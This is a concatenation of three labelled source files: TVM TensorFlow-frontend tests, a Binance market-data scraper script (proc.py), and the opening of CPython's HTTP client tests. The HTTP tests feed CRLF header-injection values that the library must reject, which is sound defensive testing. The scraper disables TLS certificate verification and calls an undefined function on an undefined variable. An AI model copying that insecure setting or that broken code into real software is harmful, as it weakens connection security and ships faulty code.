# infinity ops
# ------------
def _verify_infiniteness_ops(tf_op, name):
"""test operator infinity ops"""
# Only float types are allowed in Tensorflow for isfinite and isinf
# float16 is failing on cuda
tf_dtypes = ["float32", "float64"]
for tf_dtype in tf_dtypes:
shape = (8, 8)
data = np.random.uniform(size=shape).astype(tf_dtype)
data.ravel()[np.random.choice(data.size, int(data.size * 0.5), replace=False)] = np.infty
data.ravel()[np.random.choice(data.size, int(data.size * 0.5), replace=False)] = np.nan
tf.reset_default_graph()
in_data = tf.placeholder(tf_dtype, shape, name="in_data")
tf_op(in_data, name=name)
compare_tf_with_tvm([data], ["in_data:0"], "{}:0".format(name))
def test_forward_isinf():
_verify_infiniteness_ops(tf.is_inf, "isinf")
def test_forward_isfinite():
_verify_infiniteness_ops(tf.is_finite, "isfinite")
def test_forward_isnan():
_verify_infiniteness_ops(tf.is_nan, "isnan")
def _test_spop_placeholder_without_shape_info():
with tf.Graph().as_default():
@function.Defun(*[tf.int32] * 2)
def Forward(x, y):
print(x.name)
print(y.name)
b = tf.add(x, y)
return b
pl1 = tf.placeholder(tf.int32, name="pl1")
pl2 = tf.placeholder(tf.int32, name="pl2")
pl3 = tf.placeholder(tf.int32, name="pl3")
data = np.array([[-1, 1], [2, -2]], dtype=np.int32)
data2 = np.array([[-2, 3], [4, -6]], dtype=np.int32)
data3 = np.array([[-2, 3], [4, -6]], dtype=np.int32)
z1 = gen_functional_ops.StatefulPartitionedCall(args=[pl1, pl2], Tout=[tf.int32], f=Forward)
z2 = z1 + pl3
compare_tf_with_tvm(
[data, data2, data3],
["pl1:0", "pl2:0", "pl3:0"],
["StatefulPartitionedCall:0", z2.name],
mode="vm",
init_global_variables=True,
)
def _test_spop_placeholder_with_shape_and_default_value():
with tf.Graph().as_default():
data = np.ones([1], dtype=int).astype(np.int32)
dataVar = tf.Variable(data, shape=data.shape)
pl1 = array_ops.placeholder_with_default(dataVar, shape=data.shape, name="pl1")
tpl = tf.convert_to_tensor(pl1, dtype=tf.int32)
@function.Defun(*[tf.int32])
def pl_with_default(pl):
return tf.expand_dims(tf.multiply(pl, pl), 0)
z = gen_functional_ops.StatefulPartitionedCall(
args=[tpl], Tout=[tf.int32], f=pl_with_default
)
compare_tf_with_tvm(
data, ["pl1:0"], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
def _test_spop_placeholder_numpy_arange_feed():
with tf.Graph().as_default():
t1 = tf.placeholder(tf.int32, (3, 3, 3), "t1")
t1_data = np.arange(27, dtype=np.int32).reshape((3, 3, 3))
t2 = tf.placeholder(tf.int32, (3, 3, 3), "t2")
t2_data = np.arange(27, dtype=np.int32).reshape((3, 3, 3))
@tf.function
def add(x, y):
return tf.add(x, y, "add_t1_t2")
t3 = add(t1, t2)
compare_tf_with_tvm(
[t1_data, t2_data], ["t1:0", "t2:0"], [t3.name], mode="vm", init_global_variables=True
)
def _test_spop_placeholder_numpy_array_feed():
with tf.Graph().as_default():
t1_data = np.array([[-1, 1, 3], [2, -2, 4], [2, -3, 14]], dtype=np.int32)
t2_data = np.array([[-2, 1, 2], [12, -2, 14], [12, -3, 4]], dtype=np.int32)
t1 = tf.placeholder(tf.int32, name="t1")
t2 = tf.placeholder(tf.int32, name="t2")
@tf.function
def add(x, y):
return tf.add(x, y, "add_t1_t2")
t3 = add(t1, t2)
compare_tf_with_tvm(
[t1_data, t2_data], ["t1:0", "t2:0"], [t3.name], mode="vm", init_global_variables=True
)
def _test_spop_function_invocation_basic():
with tf.Graph().as_default():
def fun1(a):
return tf.multiply(a, a)
def fun2(b):
return tf.multiply(b, 10)
@tf.function
def fun3(x, y):
x = fun2(x)
y = fun1(y)
z = tf.add(x, y)
return z
t3 = fun3(tf.constant(10.5), tf.constant(20.4))
compare_tf_with_tvm([], [], [t3.name], mode="vm", init_global_variables=True)
def _test_spop_function_invocation_nested():
with tf.Graph().as_default():
t1 = tf.placeholder(tf.int32, (3, 3, 3), name="t1")
t1_data = np.arange(27, dtype=np.int32).reshape((3, 3, 3))
t2 = tf.placeholder(tf.int32, name="t2")
t2_data = np.arange(27, dtype=np.int32).reshape((3, 3, 3))
@tf.function
def myfunc(x, y):
return tf.add(x, y, "myfunc")
@tf.function
def myfunc2(x, y):
z = myfunc(x, y)
l = myfunc(z, y)
m = myfunc(l, z)
return tf.add(l, m, "myfunc2")
res1 = myfunc(t1, t2)
res2 = myfunc2(res1, t1)
compare_tf_with_tvm(
[t1_data, t2_data], ["t1:0", "t2:0"], [res2.name], mode="vm", init_global_variables=True
)
def _test_spop_function_invocation_no_autograph():
with tf.Graph().as_default():
@tf.function(autograph=False)
def fun1(a):
return tf.multiply(a, a)
@tf.function(autograph=False)
def fun2(b):
return tf.multiply(b, 10)
@tf.function
def fun3(x, y):
x = fun2(x)
y = fun1(y)
z = tf.add(x, y)
return z
t3 = fun3(tf.constant(10.5), tf.constant(20.4))
compare_tf_with_tvm([], [], [t3.name], mode="vm", init_global_variables=True)
def _test_spop_function_invocation_defun():
with tf.Graph().as_default():
def fun1(a):
return tf.multiply(a, a)
def fun2(b):
return tf.multiply(b, b)
@function.Defun(dtypes.float32, dtypes.float32, func_name="Fun3")
def fun3(x, y):
x = fun2(x)
y = fun1(y)
z = tf.add(x, y)
return z
op = gen_functional_ops.StatefulPartitionedCall(
args=[tf.constant(10.5), tf.constant(20.4)],
Tout=[dtypes.float32],
f=fun3,
name="SpopFnInvocation",
)
compare_tf_with_tvm([], [], "SpopFnInvocation:0", mode="vm", init_global_variables=True)
def _test_spop_arithmetic():
with tf.Graph().as_default():
@function.Defun(*[dtypes.int32] * 3)
def arithmetic(m, x, c):
z = tf.add(tf.multiply(m, x), c)
return z
m = tf.constant(10)
x = tf.constant(20)
c = tf.constant(2)
spopFn = gen_functional_ops.StatefulPartitionedCall(
args=[m, x, c], Tout=[tf.int32], f=arithmetic
)
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
def _test_spop_control_flow():
with tf.Graph().as_default():
@function.Defun(*[dtypes.float32] * 2)
def Body1(x, y):
with ops.device("/job:localhost/replica:0/task:0/device:CPU:0"):
z = math_ops.multiply(x, y)
i = 0
while i < 10:
i += 1
if i == 5:
continue
z = math_ops.multiply(x, y * i)
return z
op = gen_functional_ops.StatefulPartitionedCall(
args=[constant_op.constant(32.0), constant_op.constant(100.0)],
Tout=[dtypes.float32],
f=Body1,
)
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
def _test_spop_variables():
with tf.Graph().as_default():
const1 = tf.constant(10)
const2 = tf.constant(20)
var1 = tf.Variable(const1, dtype=tf.int32)
var2 = tf.Variable(const2, dtype=tf.int32)
@function.Defun(tf.int32, tf.int32)
def Forward(x, y):
return tf.multiply(x, y)
z = gen_functional_ops.StatefulPartitionedCall(
args=[var1, var2], Tout=[tf.int32], f=Forward
)
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", init_global_variables=True, mode="vm"
)
def _test_spop_constants():
with tf.Graph().as_default():
@function.Defun(*[dtypes.int32] * 2)
def constantsFn(x, y):
vv = tf.constant([2, 3, 4], name="vv")
z = tf.add(vv + x, y)
return z
a = tf.constant(20000, name="a")
b = tf.constant(40000, name="b")
spopFn = gen_functional_ops.StatefulPartitionedCall(
args=[a, b], Tout=[tf.int32], f=constantsFn
)
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
def _test_spop_stateful():
# This test case is to test that TVM rejects any TF stateful operations
# (including Resource Variables) except StatefulPartitionedCall/PartitionedCall
# (as these two operators can still be used as container graphs to execute
# "stateless" operations internally.
tf.reset_default_graph()
with tf.Graph().as_default():
@tf.function
def FunctionWithStatefulOp_One(i):
b = tf.random.uniform(shape=[2, 4], maxval=10, dtype=tf.float32, seed=10)
y = tf.multiply(b, i)
return y
@tf.function
def FunctionWithStatefulOp(m, n):
a = tf.random.uniform(shape=[2, 4], maxval=10, dtype=tf.float32, seed=10)
x = tf.multiply(a, m)
y = FunctionWithStatefulOp_One(n)
z = tf.multiply(x, y)
return z
op = FunctionWithStatefulOp(constant_op.constant(1.0), constant_op.constant(2.0))
with pytest.raises(Exception) as execinfo:
compare_tf_with_tvm([], [], [op.name], init_global_variables=True, mode="vm")
assert execinfo.value.args[0].startswith("The following operators are not implemented")
def _test_spop_device_assignment():
# This test case is to test that TVM rejects inconsistent device assignment
# while using StatefulPartitionedCall/PartitionedCall operators which in case of TVM will
# be used as container graphs to internally execute "stateless" operations.
tf.reset_default_graph()
with tf.Graph().as_default():
def fun1(a):
with ops.device("/GPU:0"):
return tf.multiply(a, a)
def fun2(b):
with ops.device("/job:localhost/replica:0/task:0/device:CPU:1"):
return tf.multiply(b, b)
@function.Defun(dtypes.float32, dtypes.float32, func_name="Fun3")
def fun3(x, y):
with ops.device("/CPU:0"):
x = fun2(x)
with ops.device("/job:localhost/replica:0/task:0/device:CPU:2"):
y = fun1(y)
with ops.device("/job:localhost/replica:0/task:0/device:CPU:3"):
z = tf.add(x, y)
return z
op = gen_functional_ops.StatefulPartitionedCall(
args=[tf.constant(10.5), tf.constant(20.4)], Tout=[dtypes.float32], f=fun3
)
with pytest.raises(Exception) as execinfo:
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
assert execinfo.value.args[0].startswith("Found inconsistent Device assignment")
def _test_spop_resource_variables():
# This test case is to test that TVM rejects any graph containing
# resource variables with StatefulPartitionedOp.
tf.reset_default_graph()
with tf.Graph().as_default():
const1 = tf.constant(10)
const2 = tf.constant(20)
var1 = tf.Variable(const1, dtype=tf.int32, use_resource=True)
var2 = tf.Variable(const2, dtype=tf.int32, use_resource=True)
@tf.function
def resourceVariablesTest(x, y):
return tf.multiply(x, y)
op = resourceVariablesTest(var1, var2)
with pytest.raises(Exception) as execinfo:
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
assert execinfo.value.args[0].startswith("Graph is not frozen." " Provide a frozen graph")
def test_forward_spop():
_test_spop_stateful()
_test_spop_device_assignment()
_test_spop_resource_variables()
# Placeholder test cases
_test_spop_placeholder_without_shape_info()
_test_spop_placeholder_with_shape_and_default_value()
_test_spop_placeholder_numpy_arange_feed()
_test_spop_placeholder_numpy_array_feed()
# Function Invocation test cases
_test_spop_function_invocation_basic()
_test_spop_function_invocation_nested()
_test_spop_function_invocation_no_autograph()
_test_spop_function_invocation_defun()
# Test cases for various other TF constructs
_test_spop_arithmetic()
_test_spop_control_flow()
_test_spop_variables()
_test_spop_constants()
#######################################################################
# Dynamic input shape
# -------------------
def test_forward_dynamic_input_shape():
tf.reset_default_graph()
with tf.Graph().as_default():
data = tf.placeholder(tf.float32, name="data", shape=(None,))
out = data + 1
np_data = np.random.uniform(size=(2,)).astype("float32")
out_name = "add"
with tf.Session() as sess:
graph_def = tf_testing.AddShapesToGraphDef(sess, out_name)
tf_output = run_tf_graph(sess, np_data, "data:0", ["{}:0".format(out_name)])
# TODO(kevinthesun): enable gpu test when VM heterogeneous execution is ready.
for device in ["llvm"]:
dev = tvm.device(device, 0)
if not tvm.testing.device_enabled(device):
print("Skip because %s is not enabled" % device)
continue
tvm_output = run_tvm_graph(
graph_def,
np_data,
["data"],
1,
target=device,
layout="NCHW",
out_names=[out_name],
mode="vm",
ignore_in_shape=True,
)
tvm.testing.assert_allclose(tvm_output[0], tf_output[0], rtol=1e-5, atol=1e-5)
def test_forward_dynmaic_rnn_lstmblockcell():
if package_version.parse(tf.VERSION) >= package_version.parse("2.0.0"):
return
total_series_length = 50000
truncated_backprop_length = 15
state_size = 4
echo_step = 3
batch_size = 5
num_layers = 5
def generateData():
x = np.array(np.random.choice(2, total_series_length, p=[0.5, 0.5]))
y = np.roll(x, echo_step)
y[0:echo_step] = 0
x = x.reshape((batch_size, -1)) # The first index changing slowest, subseries as rows
y = y.reshape((batch_size, -1))
return (x, y)
batchX_placeholder = tf.placeholder(tf.float32, [batch_size, truncated_backprop_length])
init_state = tf.placeholder(tf.float32, [num_layers, 2, batch_size, state_size])
state_per_layer_list = tf.unstack(init_state, axis=0)
rnn_tuple_state = tuple(
[
tf.nn.rnn_cell.LSTMStateTuple(
state_per_layer_list[idx][0], state_per_layer_list[idx][1]
)
for idx in range(num_layers)
]
)
# Forward passes
def lstm_cell():
return tensorflow.contrib.rnn.LSTMBlockCell(state_size)
cell = tf.nn.rnn_cell.MultiRNNCell(
[lstm_cell() for _ in range(num_layers)], state_is_tuple=True
)
states_series, current_state = tf.nn.dynamic_rnn(
cell, tf.expand_dims(batchX_placeholder, -1), initial_state=rnn_tuple_state
)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
x, y = generateData()
_current_state = np.zeros((num_layers, 2, batch_size, state_size))
start_idx = 0
end_idx = start_idx + truncated_backprop_length
batchX = x[:, start_idx:end_idx]
# Save current state for TVM
current_state_tvm = _current_state
_current_state, _states_series = sess.run(
[current_state, states_series],
feed_dict={batchX_placeholder: batchX, init_state: _current_state},
)
# Organize results and corresponding names
tf_output = [_states_series]
for c in _current_state:
tf_output.append(c.c)
tf_output.append(c.h)
name = [states_series.name.split(":")[0]]
for t in current_state:
name.append(t.c.name.split(":")[0])
name.append(t.h.name.split(":")[0])
graph_def = sess.graph.as_graph_def(add_shapes=True)
final_graph_def = graph_util.convert_variables_to_constants(sess, graph_def, name)
tvm_output = run_tvm_graph(
final_graph_def,
[batchX.astype("float32"), current_state_tvm.astype("float32")],
["Placeholder", "Placeholder_1"],
out_names=name,
num_output=len(name),
mode="vm",
disabled_pass=["FoldScaleAxis"],
)
# Compare result
for i in range(len(tf_output)):
tvm.testing.assert_allclose(tf_output[i], tvm_output[i], atol=1e-5, rtol=1e-5)
#######################################################################
# Unique
# ------------
def _test_unique(n, dtype, is_dyn):
tf.reset_default_graph()
np_data = np.random.randint(100, size=n).astype(dtype)
with tf.Graph().as_default():
if is_dyn:
in_data = tf.placeholder(dtype, [n], name="in_data")
else:
in_data = tf.constant(np_data, dtype, name="in_data")
tf.unique(in_data)
if is_dyn:
compare_tf_with_tvm(np_data, "in_data:0", ["Unique:0", "Unique:1"], mode="vm")
else:
compare_tf_with_tvm(None, "", ["Unique:0", "Unique:1"])
def test_forward_unique():
"""test Unique"""
for dtype in ["int32", "int64"]:
for is_dyn in [False, True]:
_test_unique(50, dtype, is_dyn)
_test_unique(100, dtype, is_dyn)
#######################################################################
# Unique with counts
# ------------
def _test_unique_with_counts(n, dtype, is_dyn):
tf.reset_default_graph()
np_data = np.random.randint(100, size=n).astype(dtype)
with tf.Graph().as_default():
if is_dyn:
in_data = tf.placeholder(dtype, [n], name="in_data")
else:
in_data = tf.constant(np_data, dtype, name="in_data")
tf.unique_with_counts(in_data)
if is_dyn:
compare_tf_with_tvm(
np_data,
"in_data:0",
["UniqueWithCounts:0", "UniqueWithCounts:1", "UniqueWithCounts:2"],
mode="vm",
)
else:
compare_tf_with_tvm(
None, "", ["UniqueWithCounts:0", "UniqueWithCounts:1", "UniqueWithCounts:2"]
)
def test_forward_unique_with_counts():
"""test UniqueWithCounts"""
for dtype in ["int32", "int64"]:
for is_dyn in [False, True]:
_test_unique_with_counts(10, dtype, is_dyn)
_test_unique_with_counts(20, dtype, is_dyn)
#######################################################################
# check graph ir for nn.moments
# ------------
def test_moments():
g = tf.Graph()
shape = [4, 176, 8, 8]
dtype = "float32"
with g.as_default():
A = tf.placeholder(shape=shape, dtype=dtype, name="A")
B = tf.placeholder(shape=shape, dtype=dtype, name="B")
mean, variance = tf.nn.moments(A, [1], keep_dims=True)
normalised_input = (A - mean) / tf.sqrt(variance + 0.0005)
mod, _ = from_tensorflow(g.as_graph_def(add_shapes=True))
program = """
def @main(%A: Tensor[(4, 176, 8, 8), float32]) {
%527 = mean(%A, axis=[1], keepdims=True) /* moments/mean */;
%528 = subtract(%A, %527) /* sub */;
%529 = subtract(%A, %527);
%530 = multiply(%529, %529) /* moments/SquaredDifference */;
%531 = mean(%530, axis=[1], keepdims=True) /* moments/variance */;
%532 = add(%531, 0.0005f) /* add */;
%533 = sqrt(%532) /* Sqrt */;
divide(%528, %533) /* truediv */
}
"""
mod_golden = tvm.parser.parse('#[version = "0.0.5"]\n' + program)
tvm.ir.assert_structural_equal(mod["main"].body, mod_golden["main"].body, map_free_vars=True)
if __name__ == "__main__":
pytest.main([__file__])
|
proc.py
|
#!/usr/bin/python3 -W ignore
import os, requests, json, time, datetime, multiprocessing, datetime, subprocess
from pprint import pprint
#create date wise directories inside json and data directories to hold json dump and minute wise data
dirname = datetime.datetime.now().strftime("%d%B") #ex: 27October
#create directory if it doesnt exist
if not os.path.exists('json/'+dirname): os.mkdir('json/'+dirname)
if not os.path.exists('data/'+dirname): os.mkdir('data/'+dirname)
fname = datetime.datetime.now().strftime("%d%B")+'.csv'
logfile = 'logs/log_'+fname
if os.path.exists(logfile): os.remove(logfile)
def get_hist_data(market):
#fetch 1m tick data for past 1000 minutes
url = 'https://api.binance.com/api/v1/klines?symbol='+market+'&interval=1m&limit=1000'
output = requests.get(url,verify=False).json()
return {x[0]: x[1:6] for x in output}
def get_data(market,duration=None):
#duration is in minutes
data = get_hist_data(market)
# data = {}
#if duration is not set this part will be skipped and only historic data will be taken
if duration:
t_end = time.time() + 60 * duration
while time.time() < t_end:
url = 'https://api.binance.com/api/v1/klines?symbol='+market+'&interval=1m&limit=5'
resp = requests.get(url)
if resp.status_code != 200:
print(market,resp.status_code)
else:
output = requests.get(url).json()[0][:6]
key = output[0]
data[output[0]] = output[1:]
dt = datetime.datetime.fromtimestamp(int(key)/1000).strftime("%Y-%m-%d %H:%M:%S")
Openn(rawdata,'a').write("{},{},{},{}".format(market,key,dt,','.join(output[1:]))+'\n')
#wait for 30 sec before querying the API again
time.sleep(30)
#dump data dictionary to file. overwrite file if exists. one file per market per date
fname = datetime.datetime.now().strftime("{}_%d%B".format(market))+'.json'
open('json/'+dirname+'/'+fname,'w').write(json.dumps(data))
# #check for missing timestamps in data
tstamps = [int(x) for x in list(data.keys())]
values = list(data.values())
start = tstamps[0]
end = tstamps[-1]
start_dt = datetime.datetime.fromtimestamp(int(start)/1000).strftime("%Y-%m-%d %H:%M:%S")
end_dt = datetime.datetime.fromtimestamp(int(end)/1000).strftime("%Y-%m-%d %H:%M:%S")
exp = int((end - start)/60000) + 1
cap = len(tstamps)
#finds the difference of range function and tstamps list
missing_tstamps = list(set(range(start,end+60000,60000)).difference(tstamps))
msg = "{},{},{},{},{},{}".format(market,start_dt,end_dt,exp,cap,len(missing_tstamps))
#write to log file. one log file per date, for all markets.
open(logfile,'a').write(msg+'\n')
# get_data('BTCUSDT')
# symbols = open(os.environ['HOME']+'/mudrex/symbols').read().splitlines()
jobs = []
markets = requests.get('https://api.binance.com/api/v1/exchangeInfo').json()['symbols']
total_markets = len(markets)
f = open('reports/report_'+dirname,'w')
f.write("Process start time (IST): {}.\n".format(datetime.datetime.now().strftime("%Y-%b-%d %H:%M:%S")))
f.write("Data collected for past 1000 minutes from now\n\n")
f.write("Total no. of markets: {}\n".format(total_markets))
markets_trading, markets_break = [],[]
for market in markets:
symbol = market['symbol']
if market['status'] == "TRADING":
markets_trading.append(symbol)
p = multiprocessing.Process(target=get_data,args=(symbol,))
jobs.append(p)
time.sleep(0.1)
p.start()
else:
markets_break.append(symbol)
f.write("Total no. of markets with status as BREAK: {}\n".format(len(markets_break)))
f.write("Total no. of markets with status as TRADING: {}\n".format(len(markets_trading)))
|
test_httplib.py
|
import errno
from http import client
import io
import itertools
import os
import array
import re
import socket
import threading
import warnings
import unittest
TestCase = unittest.TestCase
from test import support
from test.support import socket_helper
here = os.path.dirname(__file__)
# Self-signed cert file for 'localhost'
CERT_localhost = os.path.join(here, 'keycert.pem')
# Self-signed cert file for 'fakehostname'
CERT_fakehostname = os.path.join(here, 'keycert2.pem')
# Self-signed cert file for self-signed.pythontest.net
CERT_selfsigned_pythontestdotnet = os.path.join(here, 'selfsigned_pythontestdotnet.pem')
# constants for testing chunked encoding
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd! \r\n'
'8\r\n'
'and now \r\n'
'22\r\n'
'for something completely different\r\n'
)
chunked_expected = b'hello world! and now for something completely different'
chunk_extension = ";foo=bar"
last_chunk = "0\r\n"
last_chunk_extended = "0" + chunk_extension + "\r\n"
trailers = "X-Dummy: foo\r\nX-Dumm2: bar\r\n"
chunked_end = "\r\n"
HOST = socket_helper.HOST
class FakeSocket:
def __init__(self, text, fileclass=io.BytesIO, host=None, port=None):
if isinstance(text, str):
text = text.encode("ascii")
self.text = text
self.fileclass = fileclass
self.data = b''
self.sendall_calls = 0
self.file_closed = False
self.host = host
self.port = port
def sendall(self, data):
self.sendall_calls += 1
self.data += data
def makefile(self, mode, bufsize=None):
if mode != 'r' and mode != 'rb':
raise client.UnimplementedFileMode()
# keep the file around so we can check how much was read from it
self.file = self.fileclass(self.text)
self.file.close = self.file_close #nerf close ()
return self.file
def file_close(self):
self.file_closed = True
def close(self):
pass
def setsockopt(self, level, optname, value):
pass
class EPipeSocket(FakeSocket):
def __init__(self, text, pipe_trigger):
# When sendall() is called with pipe_trigger, raise EPIPE.
FakeSocket.__init__(self, text)
self.pipe_trigger = pipe_trigger
def sendall(self, data):
if self.pipe_trigger in data:
raise OSError(errno.EPIPE, "gotcha")
self.data += data
def close(self):
pass
class NoEOFBytesIO(io.BytesIO):
"""Like BytesIO, but raises AssertionError on EOF.
This is used below to test that http.client doesn't try to read
more from the underlying file than it should.
"""
def read(self, n=-1):
data = io.BytesIO.read(self, n)
if data == b'':
raise AssertionError('caller tried to read past EOF')
return data
def readline(self, length=None):
data = io.BytesIO.readline(self, length)
if data == b'':
raise AssertionError('caller tried to read past EOF')
return data
class FakeSocketHTTPConnection(client.HTTPConnection):
"""HTTPConnection subclass using FakeSocket; counts connect() calls"""
def __init__(self, *args):
self.connections = 0
super().__init__('example.com')
self.fake_socket_args = args
self._create_connection = self.create_connection
def connect(self):
"""Count the number of times connect() is invoked"""
self.connections += 1
return super().connect()
def create_connection(self, *pos, **kw):
return FakeSocket(*self.fake_socket_args)
class HeaderTests(TestCase):
def test_auto_headers(self):
# Some headers are added automatically, but should not be added by
# .request() if they are explicitly set.
class HeaderCountingBuffer(list):
def __init__(self):
self.count = {}
def append(self, item):
kv = item.split(b':')
if len(kv) > 1:
# item is a 'Key: Value' header string
lcKey = kv[0].decode('ascii').lower()
self.count.setdefault(lcKey, 0)
self.count[lcKey] += 1
list.append(self, item)
for explicit_header in True, False:
for header in 'Content-length', 'Host', 'Accept-encoding':
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('blahblahblah')
conn._buffer = HeaderCountingBuffer()
body = 'spamspamspam'
headers = {}
if explicit_header:
headers[header] = str(len(body))
conn.request('POST', '/', body, headers)
self.assertEqual(conn._buffer.count[header.lower()], 1)
def test_content_length_0(self):
class ContentLengthChecker(list):
def __init__(self):
list.__init__(self)
self.content_length = None
def append(self, item):
kv = item.split(b':', 1)
if len(kv) > 1 and kv[0].lower() == b'content-length':
self.content_length = kv[1].strip()
list.append(self, item)
# Here, we're testing that methods expecting a body get a
# content-length set to zero if the body is empty (either None or '')
bodies = (None, '')
methods_with_body = ('PUT', 'POST', 'PATCH')
for method, body in itertools.product(methods_with_body, bodies):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', body)
self.assertEqual(
conn._buffer.content_length, b'0',
'Header Content-Length incorrect on {}'.format(method)
)
# For these methods, we make sure that content-length is not set when
# the body is None because it might cause unexpected behaviour on the
# server.
methods_without_body = (
'GET', 'CONNECT', 'DELETE', 'HEAD', 'OPTIONS', 'TRACE',
)
for method in methods_without_body:
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', None)
self.assertEqual(
conn._buffer.content_length, None,
'Header Content-Length set for empty body on {}'.format(method)
)
# If the body is set to '', that's considered to be "present but
# empty" rather than "missing", so content length would be set, even
# for methods that don't expect a body.
for method in methods_without_body:
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', '')
self.assertEqual(
conn._buffer.content_length, b'0',
'Header Content-Length incorrect on {}'.format(method)
)
# If the body is set, make sure Content-Length is set.
for method in itertools.chain(methods_without_body, methods_with_body):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', ' ')
self.assertEqual(
conn._buffer.content_length, b'1',
'Header Content-Length incorrect on {}'.format(method)
)
def test_putheader(self):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn.putrequest('GET','/')
conn.putheader('Content-length', 42)
self.assertIn(b'Content-length: 42', conn._buffer)
conn.putheader('Foo', ' bar ')
self.assertIn(b'Foo: bar ', conn._buffer)
conn.putheader('Bar', '\tbaz\t')
self.assertIn(b'Bar: \tbaz\t', conn._buffer)
conn.putheader('Authorization', 'Bearer mytoken')
self.assertIn(b'Authorization: Bearer mytoken', conn._buffer)
conn.putheader('IterHeader', 'IterA', 'IterB')
self.assertIn(b'IterHeader: IterA\r\n\tIterB', conn._buffer)
conn.putheader('LatinHeader', b'\xFF')
self.assertIn(b'LatinHeader: \xFF', conn._buffer)
conn.putheader('Utf8Header', b'\xc3\x80')
self.assertIn(b'Utf8Header: \xc3\x80', conn._buffer)
conn.putheader('C1-Control', b'next\x85line')
self.assertIn(b'C1-Control: next\x85line', conn._buffer)
conn.putheader('Embedded-Fold-Space', 'is\r\n allowed')
self.assertIn(b'Embedded-Fold-Space: is\r\n allowed', conn._buffer)
conn.putheader('Embedded-Fold-Tab', 'is\r\n\tallowed')
self.assertIn(b'Embedded-Fold-Tab: is\r\n\tallowed', conn._buffer)
conn.putheader('Key Space', 'value')
self.assertIn(b'Key Space: value', conn._buffer)
conn.putheader('KeySpace ', 'value')
self.assertIn(b'KeySpace : value', conn._buffer)
conn.putheader(b'Nonbreak\xa0Space', 'value')
self.assertIn(b'Nonbreak\xa0Space: value', conn._buffer)
conn.putheader(b'\xa0NonbreakSpace', 'value')
self.assertIn(b'\xa0NonbreakSpace: value', conn._buffer)
def test_ipv6host_header(self):
# Default host header on IPv6 transaction should be wrapped by [] if
# it is an IPv6 address
expected = b'GET /foo HTTP/1.1\r\nHost: [2001::]:81\r\n' \
b'Accept-Encoding: identity\r\n\r\n'
conn = client.HTTPConnection('[2001::]:81')
sock = FakeSocket('')
conn.sock = sock
conn.request('GET', '/foo')
self.assertTrue(sock.data.startswith(expected))
expected = b'GET /foo HTTP/1.1\r\nHost: [2001:102A::]\r\n' \
b'Accept-Encoding: identity\r\n\r\n'
conn = client.HTTPConnection('[2001:102A::]')
sock = FakeSocket('')
conn.sock = sock
conn.request('GET', '/foo')
self.assertTrue(sock.data.startswith(expected))
def test_malformed_headers_coped_with(self):
# Issue 19996
body = "HTTP/1.1 200 OK\r\nFirst: val\r\n: nval\r\nSecond: val\r\n\r\n"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.getheader('First'), 'val')
self.assertEqual(resp.getheader('Second'), 'val')
def test_parse_all_octets(self):
# Ensure no valid header field octet breaks the parser
body = (
b'HTTP/1.1 200 OK\r\n'
b"!#$%&'*+-.^_`|~: value\r\n" # Special token characters
b'VCHAR: ' + bytes(range(0x21, 0x7E + 1)) + b'\r\n'
b'obs-text: ' + bytes(range(0x80, 0xFF + 1)) + b'\r\n'
b'obs-fold: text\r\n'
b' folded with space\r\n'
b'\tfolded with tab\r\n'
b'Content-Length: 0\r\n'
b'\r\n'
)
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.getheader('Content-Length'), '0')
self.assertEqual(resp.msg['Content-Length'], '0')
self.assertEqual(resp.getheader("!#$%&'*+-.^_`|~"), 'value')
self.assertEqual(resp.msg["!#$%&'*+-.^_`|~"], 'value')
vchar = ''.join(map(chr, range(0x21, 0x7E + 1)))
self.assertEqual(resp.getheader('VCHAR'), vchar)
self.assertEqual(resp.msg['VCHAR'], vchar)
self.assertIsNotNone(resp.getheader('obs-text'))
self.assertIn('obs-text', resp.msg)
for folded in (resp.getheader('obs-fold'), resp.msg['obs-fold']):
self.assertTrue(folded.startswith('text'))
self.assertIn(' folded with space', folded)
self.assertTrue(folded.endswith('folded with tab'))
def test_invalid_headers(self):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('')
conn.putrequest('GET', '/')
# http://tools.ietf.org/html/rfc7230#section-3.2.4, whitespace is no
# longer allowed in header names
cases = (
(b'Invalid\r\nName', b'ValidValue'),
(b'Invalid\rName', b'ValidValue'),
(b'Invalid\nName', b'ValidValue'),
(b'\r\nInvalidName', b'ValidValue'),
(b'\rInvalidName', b'ValidValue'),
(b'\nInvalidName', b'ValidValue'),
(b' InvalidName', b'ValidValue'),
(b'\tInvalidName', b'ValidValue'),
(b'Invalid:Name', b'ValidValue'),
(b':InvalidName', b'ValidValue'),
(b'ValidName', b'Invalid\r\nValue'),
(b'ValidName', b'Invalid\rValue'),
(b'ValidName', b'Invalid\nValue'),
(b'ValidName', b'InvalidValue\r\n'),
(b'ValidName', b'InvalidValue\r'),
(b'ValidName', b'InvalidValue\n'),
)
for name, value in cases:
with self.subTest((name, value)):
with self.assertRaisesRegex(ValueError, 'Invalid header'):
conn.putheader(name, value)
def test_headers_debuglevel(self):
body = (
b'HTTP/1.1 200 OK\r\n'
b'First: val\r\n'
